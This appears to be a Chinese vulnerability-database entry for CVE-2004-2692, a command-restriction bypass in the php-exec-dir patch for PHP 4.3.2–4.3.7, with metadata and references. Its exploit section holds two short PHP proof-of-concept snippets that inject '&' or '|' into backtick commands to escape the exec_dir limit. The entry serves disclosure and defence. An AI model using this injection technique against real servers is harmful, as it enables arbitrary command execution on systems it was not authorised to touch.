php-exec-dir补丁命令访问限制绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108111 漏洞类型 配置错误
发布时间 2004-08-08 更新时间 2007-10-09
CVE编号 CVE-2004-2692 CNNVD-ID CNNVD-200412-964
漏洞平台 PHP CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/384
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-964
|漏洞详情
带有安全模式禁用的exec_dirPHP补丁(php-exec-dir)4.3.2版本到4.3.7版本存在漏洞。远程攻击者可以借助backtick操作员绕过限制以及执行任意命令,该漏洞使用php_escape_shell_cmd函数时不作用。
|漏洞EXP
<?php 
$blah = `& /bin/ps aux`; 
echo nl2br($blah); 
?> 

<?php 
$blah = `| /bin/ps aux`; 
echo nl2br($blah); 
?> 


# milw0rm.com [2004-08-08]
|参考资料

来源:BID
名称:10598
链接:http://www.securityfocus.com/bid/10598
来源:kyberdigi.cz
链接:http://kyberdigi.cz/projects/execdir/english.html
来源:XF
名称:phpexecdir-semicolon-restriction-bypass(16498)
链接:http://xforce.iss.net/xforce/xfdb/16498
来源:OSVDB
名称:7243
链接:http://www.osvdb.org/7243
来源:SECUNIA
名称:11928
链接:http://secunia.com/advisories/11928
来源:FULLDISC
名称:20040708Re:php-exec-dirvulnerableafterlatestupgrade
链接:http://seclists.org/fulldisclosure/2004/Jul/0357.html
来源:FULLDISC
名称:20040708RE:php-exec-dirvulnerableafterlatestupgrade
链接:http://seclists.org/fulldisclosure/2004/Jul/0350.html
来源:FULLDISC
名称:20040708php-exec-dirvulnerableafterlatestupgrade
链接:http://seclists.org/fulldisclosure/2004/Jul/0347.html